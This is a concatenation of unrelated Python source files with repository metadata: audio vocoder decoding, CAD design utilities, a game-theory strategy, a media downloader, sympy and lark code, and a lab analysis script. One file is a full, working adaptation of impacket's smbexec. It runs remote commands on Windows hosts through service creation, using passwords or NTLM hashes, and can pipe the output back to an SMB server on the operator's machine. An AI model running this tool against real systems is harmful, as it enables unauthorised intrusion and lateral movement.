format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
logging.warning("logging is disabled.")
# show arguments
for key, value in vars(args).items():
logging.info("%s = %s" % (key, str(value)))
# check arguments
if args.stats is None:
args.stats = os.path.dirname(args.checkpoint) + "/stats.h5"
if args.config is None:
args.config = os.path.dirname(args.checkpoint) + "/model.conf"
if not os.path.exists(args.stats):
raise FileNotFoundError("statistics file is missing (%s)." % (args.stats))
if not os.path.exists(args.config):
raise FileNotFoundError("config file is missing (%s)." % (args.config))
# check directory existence
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# fix seed
os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# fix slow computation of dilated convargs.feats
# https://github.com/pytorch/pytorch/issues/15054#issuecomment-450191923
torch.backends.cudnn.benchmark = True
# load config
config = torch.load(args.config)
# get file list
if os.path.isdir(args.feats):
feat_list = sorted(find_files(args.feats, "*.h5"))
elif os.path.isfile(args.feats):
feat_list = read_txt(args.feats)
else:
logging.error("--feats should be directory or list.")
sys.exit(1)
# prepare the file list for parallel decoding
feat_lists = np.array_split(feat_list, args.n_gpus)
feat_lists = [f_list.tolist() for f_list in feat_lists]
# define transform
scaler = StandardScaler()
scaler.mean_ = read_hdf5(args.stats, "/" + config.feature_type + "/mean")
scaler.scale_ = read_hdf5(args.stats, "/" + config.feature_type + "/scale")
wav_transform = transforms.Compose([
lambda x: encode_mu_law(x, config.n_quantize)])
feat_transform = transforms.Compose([
lambda x: scaler.transform(x)])
f0_transform = transforms.Compose([partial(shift_semi_tone_f0_pulse, shift=args.f0_shift)])
# define gpu decode function
def gpu_decode(feat_list, gpu):
# set default gpu and do not track gradient
torch.cuda.set_device(gpu)
torch.set_grad_enabled(False)
# define model and load parameters
if config.use_upsampling_layer:
upsampling_factor = config.upsampling_factor
else:
upsampling_factor = 0
if args.use_pulse:
_WaveNet = WaveNetPulse
else:
_WaveNet = WaveNet
config.n_aux = 28
model = _WaveNet(
n_quantize=config.n_quantize,
n_aux=config.n_aux,
n_resch=config.n_resch,
n_skipch=config.n_skipch,
dilation_depth=config.dilation_depth,
dilation_repeat=config.dilation_repeat,
kernel_size=config.kernel_size,
upsampling_factor=upsampling_factor)
model.load_state_dict(torch.load(args.checkpoint, map_location=lambda storage, loc: storage)["model"])
model.eval()
model.cuda()
print(args.use_pulse)
# define generator
generator = decode_generator(
feat_list,
batch_size=args.batch_size,
feature_type=config.feature_type,
wav_transform=wav_transform,
feat_transform=feat_transform,
f0_transform=f0_transform,
upsampling_factor=config.upsampling_factor,
use_upsampling_layer=config.use_upsampling_layer,
use_speaker_code=config.use_speaker_code,
use_pulse=args.use_pulse)
# decode
if args.batch_size > 1:
for feat_ids, (batch_x, batch_h, batch_p, n_samples_list) in generator:
logging.info("decoding start")
samples_list = model.batch_fast_generate(
batch_x, batch_h, n_samples_list, batch_p, intervals=args.intervals)
for feat_id, samples in zip(feat_ids, samples_list):
wav = decode_mu_law(samples, config.n_quantize)
sf.write(args.outdir + "/" + feat_id + ".wav", wav, args.fs, "PCM_16")
logging.info("wrote %s.wav in %s." % (feat_id, args.outdir))
else:
raise NotImplementedError
# parallel decode
processes = []
for gpu, feat_list in enumerate(feat_lists):
p = mp.Process(target=gpu_decode, args=(feat_list, gpu,))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
if __name__ == "__main__":
args = parse_args()
# data_folder = '/home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/wav_hpf/tr_slt'
#
# filenames = os.listdir(data_folder)
# # filenames = sorted(find_files(args.waveforms, "*.wav", use_dir_name=False))
# print(filenames)
#
# data_folder = '/home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/wav_hpf/tr_slt'
# args.hdf5dir = 'test'
# args.wavdir = data_folder
main(args)
# wav_list = [os.path.join(data_folder, filename) for filename in filenames]
# wav_list = wav_list[:2]
# world_feature_extract(wav_list, args)
| 36.4942
| 114
| 0.610401
|
4a07d4fdb65e870f524bdfa87d9abe5d5ec73f34
| 13,971
|
py
|
Python
|
deps/smbexec1.py
|
IMULMUL/portia-1
|
2e6e608d926026ec63e151dfd23ea5bead9307bb
|
[
"Apache-2.0"
] | 514
|
2017-07-23T09:29:52.000Z
|
2022-03-30T16:45:01.000Z
|
deps/smbexec1.py
|
crypticterminal/portia-1
|
36b974a9f48fc73f1306640e85554c3ceda1c825
|
[
"Apache-2.0"
] | 9
|
2017-08-02T05:01:19.000Z
|
2018-12-27T14:40:26.000Z
|
deps/smbexec1.py
|
crypticterminal/portia-1
|
36b974a9f48fc73f1306640e85554c3ceda1c825
|
[
"Apache-2.0"
] | 137
|
2017-07-29T23:41:38.000Z
|
2022-03-21T03:50:03.000Z
|
#!/usr/bin/env python
# Copyright (c) 2003-2016 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to psexec w/o using RemComSvc. The technique is described here
# http://www.accuvant.com/blog/owning-computers-without-shell-access
# Our implementation goes one step further, instantiating a local smbserver to receive the
# output of the commands. This is useful in the situation where the target machine does NOT
# have a writeable share available.
# Keep in mind that, although this technique might help avoiding AVs, there are a lot of
# event logs generated and you can't expect executing tasks that will last long since Windows
# will kill the process since it's not responding as a Windows service.
# Certainly not a stealthy way.
#
# This script works in two ways:
# 1) share mode: you specify a share, and everything is done through that share.
# 2) server mode: if for any reason there's no share available, this script will launch a local
# SMB server, so the output of the commands executed are sent back by the target machine
# into a locally shared folder. Keep in mind you would need root access to bind to port 445
# in the local machine.
#
# Author:
# beto (@agsolino)
#
# Reference for:
# DCE/RPC and SMB.
import sys
import os
import cmd
import argparse
import ConfigParser
import logging
from threading import Thread
from impacket.examples import logger
from impacket import version, smbserver
from impacket.smbconnection import *
from impacket.dcerpc.v5 import transport, scmr
OUTPUT_FILENAME = '__output'
BATCH_FILENAME = 'execute.bat'
SMBSERVER_DIR = '__tmp'
DUMMY_SHARE = 'TMP'
results=''
class SMBServer(Thread):
def __init__(self):
Thread.__init__(self)
self.smb = None
def cleanup_server(self):
logging.info('Cleaning up..')
try:
os.unlink(SMBSERVER_DIR + '/smb.log')
except:
pass
os.rmdir(SMBSERVER_DIR)
def run(self):
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global','log_file',SMBSERVER_DIR + '/smb.log')
smbConfig.set('global','credentials_file','')
# Let's add a dummy share
smbConfig.add_section(DUMMY_SHARE)
smbConfig.set(DUMMY_SHARE,'comment','')
smbConfig.set(DUMMY_SHARE,'read only','no')
smbConfig.set(DUMMY_SHARE,'share type','0')
smbConfig.set(DUMMY_SHARE,'path',SMBSERVER_DIR)
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path')
self.smb = smbserver.SMBSERVER(('0.0.0.0',445), config_parser = smbConfig)
logging.info('Creating tmp directory')
try:
os.mkdir(SMBSERVER_DIR)
except Exception, e:
logging.critical(str(e))
pass
logging.info('Setting up SMB Server')
self.smb.processConfigFile()
logging.info('Ready to listen...')
try:
self.smb.serve_forever()
except:
pass
def stop(self):
self.cleanup_server()
self.smb.socket.close()
self.smb.server_close()
self._Thread__stop()
class CMDEXEC:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None,
doKerberos=None, kdcHost=None, mode=None, share=None, port=445, command=None):
self.__command = command
self.__username = username
self.__password = password
self.__port = port
self.__serviceName = 'BTOBTO1'
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__share = share
self.__mode = mode
self.shell = None
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getOutput(self):
return results
def run(self, remoteName, remoteHost):
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % remoteName
logging.debug('StringBinding %s'%stringbinding)
rpctransport = transport.DCERPCTransportFactory(stringbinding)
rpctransport.set_dport(self.__port)
rpctransport.setRemoteHost(remoteHost)
if hasattr(rpctransport,'preferred_dialect'):
rpctransport.preferred_dialect(SMB_DIALECT)
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
self.shell = None
try:
if self.__mode == 'SERVER':
serverThread = SMBServer()
serverThread.daemon = True
serverThread.start()
self.shell = RemoteShell(self.__share, rpctransport, self.__mode, self.__serviceName, self.__command)
#self.shell.cmdloop()
if self.__mode == 'SERVER':
serverThread.stop()
except (Exception, KeyboardInterrupt), e:
#import traceback
#traceback.print_exc()
logging.critical(str(e))
if self.shell is not None:
self.shell.finish()
sys.stdout.flush()
print "exit"
#sys.exit(1)
class RemoteShell(cmd.Cmd):
def __init__(self, share, rpc, mode, serviceName, command):
cmd.Cmd.__init__(self)
self.__share = share
self.__mode = mode
self.__output = '\\\\127.0.0.1\\' + self.__share + '\\' + OUTPUT_FILENAME
self.__batchFile = '%TEMP%\\' + BATCH_FILENAME
self.__outputBuffer = ''
self.__command = command
self.__shell = '%COMSPEC% /Q /c '
self.__serviceName = serviceName
self.__rpc = rpc
self.intro = '[!] Launching semi-interactive shell - Careful what you execute'
self.__scmr = rpc.get_dce_rpc()
try:
self.__scmr.connect()
except Exception, e:
print "exit1"
logging.critical(str(e))
sys.exit(1)
s = rpc.get_smb_connection()
# We don't wanna deal with timeouts from now on.
s.setTimeout(100000)
if mode == 'SERVER':
myIPaddr = s.getSMBServer().get_socket().getsockname()[0]
self.__copyBack = 'copy %s \\\\%s\\%s' % (self.__output, myIPaddr, DUMMY_SHARE)
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
self.transferClient = rpc.get_smb_connection()
self.do_cd('')
self.execute_remote(command)
global results
results = self.__outputBuffer
print self.__outputBuffer
def finish(self):
# Just in case the service is still created
try:
self.__scmr = self.__rpc.get_dce_rpc()
self.__scmr.connect()
self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
resp = scmr.hROpenSCManagerW(self.__scmr)
self.__scHandle = resp['lpScHandle']
resp = scmr.hROpenServiceW(self.__scmr, self.__scHandle, self.__serviceName)
service = resp['lpServiceHandle']
scmr.hRDeleteService(self.__scmr, service)
scmr.hRControlService(self.__scmr, service, scmr.SERVICE_CONTROL_STOP)
scmr.hRCloseServiceHandle(self.__scmr, service)
except:
pass
def do_shell(self, s):
os.system(s)
def do_exit(self, s):
return True
def emptyline(self):
return False
def do_cd(self, s):
# We just can't CD or mantain track of the target dir.
if len(s) > 0:
logging.error("You can't CD under SMBEXEC. Use full paths.")
self.execute_remote('cd ' )
if len(self.__outputBuffer) > 0:
# Stripping CR/LF
self.prompt = string.replace(self.__outputBuffer,'\r\n','') + '>'
self.__outputBuffer = ''
def do_CD(self, s):
return self.do_cd(s)
def default(self, line):
if line != '':
self.send_data(line)
def get_output(self):
def output_callback(data):
self.__outputBuffer += data
if self.__mode == 'SHARE':
self.transferClient.getFile(self.__share, OUTPUT_FILENAME, output_callback)
self.transferClient.deleteFile(self.__share, OUTPUT_FILENAME)
else:
fd = open(SMBSERVER_DIR + '/' + OUTPUT_FILENAME,'r')
output_callback(fd.read())
fd.close()
os.unlink(SMBSERVER_DIR + '/' + OUTPUT_FILENAME)
def execute_remote(self, data):
command = self.__shell + 'echo ' + data + ' ^> ' + self.__output + ' 2^>^&1 > ' + self.__batchFile + ' & ' + \
self.__shell + self.__batchFile
if self.__mode == 'SERVER':
command += ' & ' + self.__copyBack
command += ' & ' + 'del ' + self.__batchFile
logging.debug('Executing %s' % command)
resp = scmr.hRCreateServiceW(self.__scmr, self.__scHandle, self.__serviceName, self.__serviceName,
lpBinaryPathName=command, dwStartType=scmr.SERVICE_DEMAND_START)
service = resp['lpServiceHandle']
try:
scmr.hRStartServiceW(self.__scmr, service)
except:
pass
scmr.hRDeleteService(self.__scmr, service)
scmr.hRCloseServiceHandle(self.__scmr, service)
self.get_output()
def send_data(self, data):
self.execute_remote(data)
print self.__outputBuffer
self.__outputBuffer = ''
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser()
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-share', action='store', default = 'C$', help='share where the output will be grabbed from '
'(default C$)')
parser.add_argument('-mode', action='store', choices = {'SERVER','SHARE'}, default='SHARE',
help='mode to use (default SHARE, SERVER needs root!)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. '
'If ommited it use the domain part (FQDN) specified in the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address", help='IP Address of the target machine. If '
'ommited it will use whatever was specified as target. This is useful when target is the NetBIOS '
'name and you cannot resolve it')
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
help='Destination port to connect to SMB Server')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, remoteName = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
#In case the password contains '@'
if '@' in remoteName:
password = password + '@' + remoteName.rpartition('@')[0]
remoteName = remoteName.rpartition('@')[2]
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.target_ip is None:
options.target_ip = remoteName
if options.aesKey is not None:
options.k = True
try:
command='ipconfig /all'
executer = CMDEXEC(username, password, domain, options.hashes, options.aesKey, options.k,
options.dc_ip, options.mode, options.share, int(options.port), command)
executer.run(remoteName, options.target_ip)
except Exception, e:
logging.critical(str(e))
sys.exit(0)
| 38.593923
| 138
| 0.621001
|
4a07d5a9e65e5c19a47a1d4edee2d5658d8cf8d7
| 3,951
|
py
|
Python
|
api_examples/design_advanced_functions.py
|
popupcad/popupcad
|
d3da448260cd5cb9e05417b0a723d7f73ae4e06e
|
[
"MIT"
] | 19
|
2015-08-01T22:13:39.000Z
|
2020-03-07T03:55:46.000Z
|
api_examples/design_advanced_functions.py
|
CadQuery/popupcad
|
b0c7b406d4b288c7cb375340323bba0252aedbfb
|
[
"MIT"
] | 106
|
2015-07-23T19:58:01.000Z
|
2019-05-14T03:46:08.000Z
|
api_examples/design_advanced_functions.py
|
CadQuery/popupcad
|
b0c7b406d4b288c7cb375340323bba0252aedbfb
|
[
"MIT"
] | 9
|
2015-10-04T23:38:41.000Z
|
2020-07-16T03:50:34.000Z
|
# -*- coding: utf-8 -*-
"""
Written by Daniel M. Aukes and CONTRIBUTORS
Email: danaukes<at>asu.edu.
Please see LICENSE for full license.
"""
def remap_subdesign_ids(design):
subdesigns_orig = design.subdesigns.copy()
subdesign_mapping = []
subdesigns_new = {}
for key,subdesign in subdesigns_orig.items():
new_sketch = subdesign.copy(identical = False)
subdesigns_new[new_sketch.id] = new_sketch
subdesign_mapping.append((key,new_sketch.id))
for oldref, newref in subdesign_mapping:
design.replace_subdesign_refs(oldref,newref)
design.subdesigns = subdesigns_new
return subdesign_mapping
def remap_sketch_ids(design):
sub_sketches_orig = design.sketches.copy()
sketch_mapping = []
sub_sketches_new = {}
for key,sketch in sub_sketches_orig.items():
new_sketch = sketch.copy(identical = False)
sub_sketches_new[new_sketch.id] = new_sketch
sketch_mapping.append((key,new_sketch.id))
for oldref, newref in sketch_mapping:
design.replace_sketch_refs_force(oldref,newref)
design.sketches = sub_sketches_new
return sketch_mapping
def strip_locates(design):
for ii in range(len(design.operations))[::-1]:
op = design.operations[ii]
if hasattr(op,'locationgeometry'):
design.pop_operation(ii)
def remap_operation_ids(design):
op_mapping = []
sub_ops_new = []
for op in design.operations:
new_op = op.copy_wrapper()
new_op.id = id(new_op)
sub_ops_new.append(new_op)
op_mapping.append((op,new_op))
design.operations = sub_ops_new
for oldref,newref in [(op1.id,op2.id) for op1,op2 in op_mapping]:
design.replace_op_refs2(oldref,newref)
return op_mapping
def switch_layer_defs(design,layerdef_new):
for ii,op in enumerate(design.operations):
if hasattr(op,'switch_layer_defs'):
design.operations[ii]=op.switch_layer_defs(design.return_layer_definition(),layerdef_new)
def external_to_internal_transform_outer(design,subdesign,sketch_mapping,op_mapping):
op_mapping2 = []
from popupcad.manufacturing.transform_external import TransformExternal
sketch_mapping_dict = dict(sketch_mapping)
op_mapping_dict = dict([(item1.id,item2.id) for item1,item2 in op_mapping])
for ii,op in enumerate(design.operations):
if isinstance(op, TransformExternal):
if op.design_links['subdesign'][0] == subdesign.id:
new = op.to_internal_transform(sketch_mapping_dict,op_mapping_dict)
design.operations[ii]=new
op_mapping2.append((op.id,new.id))
for oldref,newref in op_mapping2:
design.replace_op_refs2(oldref,newref)
def remap_sub(subdesign):
#reassign new ids to subdesign sketches and remap their use within the subdesign
debug = True
subdesign_mapping = remap_subdesign_ids(subdesign)
sketch_mapping = remap_sketch_ids(subdesign)
strip_locates(subdesign)
op_mapping = remap_operation_ids(subdesign)
if debug:
subdesign.save_yaml('C:/Users/danaukes/desktop/test.cad')
return subdesign_mapping,sketch_mapping,op_mapping
def merge_designs(design,subdesign,index):
debug = True
subdesign_mapping,sketch_mapping,op_mapping = remap_sub(subdesign)
design.subdesigns.update(subdesign.subdesigns)
design.sketches.update(subdesign.sketches)
if debug:
design.save_yaml('C:/Users/danaukes/desktop/test2.cad')
switch_layer_defs(subdesign,design.return_layer_definition())
if debug:
subdesign.save_yaml('C:/Users/danaukes/desktop/test3.cad')
design.operations = design.operations[:index]+subdesign.operations+design.operations[index:]
if debug:
design.save_yaml('C:/Users/danaukes/desktop/test4.cad')
return subdesign_mapping,sketch_mapping,op_mapping
| 34.657895
| 101
| 0.704126
|
4a07d5dbfe208f07693094b74dc340bb2cd5b2c3
| 1,114
|
py
|
Python
|
axelrod/strategies/gradualkiller.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/strategies/gradualkiller.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | null | null | null |
axelrod/strategies/gradualkiller.py
|
t0nyt93/Axelroddd
|
66d95378d3ece8b32afeb1c77d305397bd9a815e
|
[
"MIT"
] | 1
|
2019-03-11T08:56:09.000Z
|
2019-03-11T08:56:09.000Z
|
from axelrod.actions import Actions
from axelrod.player import Player
from axelrod.strategy_transformers import InitialTransformer
from axelrod.actions import Action
C, D = Actions.C, Actions.D
@InitialTransformer((D, D, D, D, D, C, C), name_prefix=None)
class GradualKiller(Player):
"""
It begins by defecting in the first five moves, then cooperates two times.
It then defects all the time if the opponent has defected in move 6 and 7,
else cooperates all the time.
Initially designed to stop Gradual from defeating TitForTat in a 3 Player
tournament.
Names
- Gradual Killer: [PRISON1998]_
"""
# These are various properties for the strategy
name = 'Gradual Killer'
classifier = {
'memory_depth': float('Inf'),
'stochastic': False,
'makes_use_of': set(),
'long_run_time': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def strategy(self, opponent: Player) -> Action:
if opponent.history[5:7] == [D, D]:
return D
return C
| 28.564103
| 78
| 0.664273
|
4a07d67bbb8d22e391a3fae7fcdd93ebc3f35549
| 2,209
|
py
|
Python
|
doc/test/test-data-provider/weibo_spider/downloader/downloader.py
|
baijunhan/data-flow
|
7cba999c49dd38a4d4afe9f9076cda80b3c6ea7c
|
[
"Apache-2.0"
] | 6
|
2021-01-25T17:36:17.000Z
|
2021-05-18T12:14:02.000Z
|
doc/test/test-data-provider/weibo_spider/downloader/downloader.py
|
baijunhan/data-flow
|
7cba999c49dd38a4d4afe9f9076cda80b3c6ea7c
|
[
"Apache-2.0"
] | 6
|
2021-08-31T21:49:48.000Z
|
2022-03-02T10:13:08.000Z
|
doc/test/test-data-provider/weibo_spider/downloader/downloader.py
|
baijunhan/data-flow
|
7cba999c49dd38a4d4afe9f9076cda80b3c6ea7c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: UTF-8 -*-
import logging
import os
import sys
from abc import ABC, abstractmethod
import requests
from requests.adapters import HTTPAdapter
from tqdm import tqdm
logger = logging.getLogger('spider.downloader')
class Downloader(ABC):
def __init__(self, file_dir, file_download_timeout):
self.file_dir = file_dir
self.describe = ''
self.key = ''
self.file_download_timeout = [5, 5, 10]
if (isinstance(file_download_timeout, list)
and len(file_download_timeout) == 3):
for i in range(3):
v = file_download_timeout[i]
if isinstance(v, (int, float)) and v > 0:
self.file_download_timeout[i] = v
@abstractmethod
def handle_download(self, urls, w):
"""下载 urls 里所指向的图片或视频文件,使用 w 里的信息来生成文件名"""
pass
def download_one_file(self, url, file_path, weibo_id):
"""下载单个文件(图片/视频)"""
try:
if not os.path.isfile(file_path):
s = requests.Session()
s.mount(url,
HTTPAdapter(max_retries=self.file_download_timeout[0]))
downloaded = s.get(url,
timeout=(self.file_download_timeout[1],
self.file_download_timeout[2]))
with open(file_path, 'wb') as f:
f.write(downloaded.content)
except Exception as e:
error_file = self.file_dir + os.sep + 'not_downloaded.txt'
with open(error_file, 'ab') as f:
url = weibo_id + ':' + file_path + ':' + url + '\n'
f.write(url.encode(sys.stdout.encoding))
logger.exception(e)
def download_files(self, weibos):
"""下载文件(图片/视频)"""
try:
logger.info(u'即将进行%s下载', self.describe)
for w in tqdm(weibos, desc='Download progress'):
if getattr(w, self.key) != u'无':
self.handle_download(getattr(w, self.key), w)
logger.info(u'%s下载完毕,保存路径:', self.describe)
logger.info(self.file_dir)
except Exception as e:
logger.exception(e)
| 35.629032
| 79
| 0.550475
|
4a07d6a1f492398096bebfa7adad4fd17ffffb64
| 2,275
|
py
|
Python
|
sympy/matrices/expressions/trace.py
|
JMSS-Unknown/sympy
|
cd98ba006b5c6d6a6d072eafa28ea6d0ebdaf0e7
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/matrices/expressions/trace.py
|
JMSS-Unknown/sympy
|
cd98ba006b5c6d6a6d072eafa28ea6d0ebdaf0e7
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/matrices/expressions/trace.py
|
JMSS-Unknown/sympy
|
cd98ba006b5c6d6a6d072eafa28ea6d0ebdaf0e7
|
[
"BSD-3-Clause"
] | 1
|
2018-10-21T06:32:46.000Z
|
2018-10-21T06:32:46.000Z
|
from __future__ import print_function, division
from sympy import Basic, Expr, sympify
from sympy.matrices.matrices import MatrixBase
from .matexpr import ShapeError
class Trace(Expr):
"""Matrix Trace
Represents the trace of a matrix expression.
>>> from sympy import MatrixSymbol, Trace, eye
>>> A = MatrixSymbol('A', 3, 3)
>>> Trace(A)
Trace(A)
See Also:
trace
"""
is_Trace = True
def __new__(cls, mat):
mat = sympify(mat)
if not mat.is_Matrix:
raise TypeError("input to Trace, %s, is not a matrix" % str(mat))
if not mat.is_square:
raise ShapeError("Trace of a non-square matrix")
return Basic.__new__(cls, mat)
def _eval_transpose(self):
return self
def _eval_derivative(self, v):
from sympy import Dummy, MatrixExpr, Sum
if not isinstance(v, MatrixExpr):
return None
t1 = Dummy("t_1")
m = Dummy("m")
n = Dummy("n")
return MatrixExpr.from_index_summation(
Sum(self.args[0][t1, t1].diff(v[m, n]), (t1, 0, self.args[0].shape[0]-1)),
m,
dimensions=(v.args[1:])
)
@property
def arg(self):
return self.args[0]
def doit(self, **kwargs):
if kwargs.get('deep', True):
arg = self.arg.doit(**kwargs)
try:
return arg._eval_trace()
except (AttributeError, NotImplementedError):
return Trace(arg)
else:
# _eval_trace would go too deep here
if isinstance(self.arg, MatrixBase):
return trace(self.arg)
else:
return Trace(self.arg)
def _eval_rewrite_as_Sum(self, **kwargs):
from sympy import Sum, Dummy
i = Dummy('i')
return Sum(self.arg[i, i], (i, 0, self.arg.rows-1)).doit()
def trace(expr):
""" Trace of a Matrix. Sum of the diagonal elements
>>> from sympy import trace, Symbol, MatrixSymbol, pprint, eye
>>> n = Symbol('n')
>>> X = MatrixSymbol('X', n, n) # A square matrix
>>> trace(2*X)
2*Trace(X)
>>> trace(eye(3))
3
See Also:
Trace
"""
return Trace(expr).doit()
| 24.728261
| 90
| 0.553407
|
4a07d7a3c10390c181db9ad5c1ab33aed0a28853
| 2,609
|
py
|
Python
|
tests/test_cache.py
|
asellappen/lark
|
da6a4e4d00022452abf59df4b4232480608d4f7d
|
[
"MIT"
] | 1
|
2020-12-04T09:16:33.000Z
|
2020-12-04T09:16:33.000Z
|
tests/test_cache.py
|
asellappen/lark
|
da6a4e4d00022452abf59df4b4232480608d4f7d
|
[
"MIT"
] | null | null | null |
tests/test_cache.py
|
asellappen/lark
|
da6a4e4d00022452abf59df4b4232480608d4f7d
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import sys
from unittest import TestCase, main
from lark import Lark, Tree
from lark.lexer import Lexer, Token
import lark.lark as lark_module
try:
from StringIO import StringIO
except ImportError:
from io import BytesIO as StringIO
import tempfile, os
class MockFile(StringIO):
def close(self):
pass
def __enter__(self):
return self
def __exit__(self, *args):
pass
class MockFS:
def __init__(self):
self.files = {}
def open(self, name, mode=None):
if name not in self.files:
f = self.files[name] = MockFile()
else:
f = self.files[name]
f.seek(0)
return f
def exists(self, name):
return name in self.files
class CustomLexer(Lexer):
def __init__(self, lexer_conf):
pass
def lex(self, data):
for obj in data:
yield Token('A', obj)
class TestCache(TestCase):
def setUp(self):
pass
def test_simple(self):
g = '''start: "a"'''
fn = "bla"
fs = lark_module.FS
mock_fs = MockFS()
try:
lark_module.FS = mock_fs
Lark(g, parser='lalr', cache=fn)
assert fn in mock_fs.files
parser = Lark(g, parser='lalr', cache=fn)
assert parser.parse('a') == Tree('start', [])
mock_fs.files = {}
assert len(mock_fs.files) == 0
Lark(g, parser='lalr', cache=True)
assert len(mock_fs.files) == 1
parser = Lark(g, parser='lalr', cache=True)
assert parser.parse('a') == Tree('start', [])
parser = Lark(g+' "b"', parser='lalr', cache=True)
assert len(mock_fs.files) == 2
assert parser.parse('ab') == Tree('start', [])
parser = Lark(g, parser='lalr', cache=True)
assert parser.parse('a') == Tree('start', [])
# Test with custom lexer
mock_fs.files = {}
parser = Lark(g, parser='lalr', lexer=CustomLexer, cache=True)
parser = Lark(g, parser='lalr', lexer=CustomLexer, cache=True)
assert len(mock_fs.files) == 1
assert parser.parse('a') == Tree('start', [])
# Test options persistence
mock_fs.files = {}
Lark(g, parser="lalr", debug=True, cache=True)
parser = Lark(g, parser="lalr", debug=True, cache=True)
assert parser.options.options['debug']
finally:
lark_module.FS = fs
if __name__ == '__main__':
main()
| 25.578431
| 74
| 0.549636
|
4a07d900ad7b599f70e637c4d796bad04485147c
| 23,786
|
py
|
Python
|
04_logreg_vis/main3b.py
|
cxrodgers/Rodgers2021
|
cbcc166f9c06b18022cec91a289a1e84ece791ae
|
[
"MIT"
] | null | null | null |
04_logreg_vis/main3b.py
|
cxrodgers/Rodgers2021
|
cbcc166f9c06b18022cec91a289a1e84ece791ae
|
[
"MIT"
] | null | null | null |
04_logreg_vis/main3b.py
|
cxrodgers/Rodgers2021
|
cbcc166f9c06b18022cec91a289a1e84ece791ae
|
[
"MIT"
] | null | null | null |
## Heatmap the contacts and anti-contacts in the warped plot by their evidence
# Uses data:
# big_weights_part
# reduced_model_results_sbrc/no_opto/contact_binarized+anti_contact_count+angle+anti_angle_max
"""
4A, bottom; S4A, bottom
PLOT_EDGE_SUMMARY_ONLY
Image of the different shape positions in the consensus space
4B
PLOT_OCCUPANCY_DISCONLY
Locations of whisks with contact and whisks without contact
4C; S4B
PLOT_EVIDENCE_DISCONLY_REWSIDEONLY
Evidence for stimulus in both whisks with and without contact
S4C
PLOT_EVIDENCE_DISCONLY_CHOICEONLY
Evidence for choice in both whisks with and without contact
"""
import json
import os
import pandas
import numpy as np
import my.plot
import matplotlib.pyplot as plt
import matplotlib
import extras
## Plot flags
my.plot.manuscript_defaults()
my.plot.font_embed()
## Parameters
with open('../parameters') as fi:
params = json.load(fi)
## Load metadata about sessions
session_df, task2mouse, mouse2task = my.dataload.load_session_metadata(params)
big_tm = pandas.read_pickle(os.path.join(params['patterns_dir'], 'big_tm'))
# Insert mouse and task levels into big_tm
big_tm = my.misc.insert_mouse_and_task_levels(
big_tm, mouse2task, level=0, sort=True)
# Count the number of trials per session
n_trials_per_session = big_tm.groupby(['task', 'mouse', 'session']).size()
# Count the number of trials per mouse
n_trials_per_mouse = n_trials_per_session.sum(level=['task', 'mouse'])
## Load warping data
transformation_df = pandas.read_pickle(
os.path.join(params['scaling_dir'], 'transformation_df'))
